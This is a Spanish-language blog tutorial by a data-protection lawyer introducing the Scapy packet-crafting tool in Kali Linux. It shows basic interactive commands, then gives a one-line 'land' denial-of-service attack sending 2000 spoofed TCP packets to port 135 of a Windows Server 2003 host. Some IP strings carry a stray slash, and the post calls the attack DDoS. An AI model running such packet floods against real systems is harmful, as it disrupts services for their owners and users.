Scapy es una herramienta universal para implementar ataques de red.
Oleg Petukhov, abogado en el campo del derecho internacional y la protección de datos personales, especialista en información seguridad, protección de la información y datos personales.
Canal de Telegram: https://t.me/protecciondelainformacion1
Grupo de Telegramas: https://t.me/protecciondelainformacion2
Sitio web: https://legascom.ru
Correo electrónico: online@legascom.ru
#proteccióndelainformación #seguridaddelainformación
Antes de comenzar a considerar los tipos de ataques de red, me gustaría presentar al lector otra herramienta interesante y flexible incluida con Kali Linux, que es la utilidad Scapy. Esta utilidad flexible y funcional está escrita en Python. Esta utilidad está diseñada para la manipulación de paquetes de red. Con su ayuda, puede ensamblar el paquete IP de la estructura necesaria para realizar ataques de red.
Antes de comenzar con Scapy, debe recordar la estructura del paquete IP.
Trabajando con la utilidad Scapy, nosotros mismos llenaremos estos campos con la información necesaria.
Entonces, ejecutemos Scapy.
root@kali:~# scapy
>>>
Después de ejecutar la utilidad, el indicador de entrada es ">>>". La presencia de este indicador indica que Scapy está en modo interactivo y todos los comandos introducidos serán interpretados por la utilidad.
Para empezar, veamos la configuración actual.
>>> conf
El comando conf muestra la configuración actual del archivo de configuración.
Ahora tenemos que crear nuestro paquete. Como se sabe, la pila TCP / IP en varios sistemas operativos se basa en el cumplimiento de los estándares RFC, que definen la interacción de la red. Pero para llevar a cabo varios ataques, los paquetes creados no siempre tienen que cumplir completamente con los estándares RFC.
En Scapy, primero debe definir las variables y atributos del paquete que desea. Entonces, la variable x que tenemos definirá el valor ttl del paquete, igual a 64.
>>> x=IP(ttl=64)
>>> x
A continuación, agregaremos atributos adicionales a nuestro paquete. En primer lugar, necesitamos las direcciones del remitente y del destinatario. En el siguiente ejemplo, el remitente es 192.168.1.101 y el receptor es 192.168.1.122.
>>> x.src="/192.168.1.101"
>>> x.dst="192.168.1.122"
Puede verificar los valores actuales de la variable x simplemente especificando el nombre de la variable dada en el intérprete.
>>> x
Aparte de eso, Scapy tiene muchas características integradas. Puede conocer estas funciones utilizando el comando lsc.
>>> lsc()
Como otro ejemplo, usemos el comando "enviar". Este comando se usa cuando necesitamos enviar un paquete. Como ejemplo, intentemos enviar un paquete que creamos en la variable x.
>>> send(x)
Como puede ver, nuestro paquete especialmente diseñado se envió a la dirección del destinatario. Del mismo modo, puede especificar otros parámetros del paquete IP, como window_size, flags, fragmentation, acknowledgement, sequence number.
Ahora vamos a llevar a cabo un pequeño ataque DDoS con la ayuda de Scapy. Digamos que tenemos un sistema de destino que ejecuta Windows Server 2003 (curiosamente, todavía hay cientos de miles de servidores que ejecutan este sistema operativo) y es vulnerable a un ataque de tipo "land". Este ataque DoS consiste en enviar una gran cantidad de paquetes con las mismas direcciones IP y puertos de remitente y receptor. Como resultado de este ataque, la máquina no necesariamente se congelará, pero la desaceleración en el sistema seguramente ocurrirá. Por ejemplo, para los servidores web, tal ataque puede ser crítico.
Con Scapy, Este ataque se puede implementar de la siguiente manera.
>>> send(IP(src="/192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
En este ejemplo:
send-enviar paquete;
IP-protocolo utilizado;
src= "192.168.1.122" - fuente del paquete;
dst= "192.168.1.122" - receptor del paquete;
Protocolo TCP de capa de transporte;
sport = 135-puerto de origen;
dport = 135-puerto del receptor;
count = 2000 es el número de paquetes que queremos enviar.
Scapy no es solo un medio para implementar ataques de denegación de Servicio.
Con la ayuda de esta utilidad, puede construir cualquier paquete con los campos y el contenido necesarios. Por lo tanto, recomendaría usar esta herramienta cuando realice auditorías de seguridad de la información.
En las próximas publicaciones, volveremos a abordar los ataques a nivel de red.
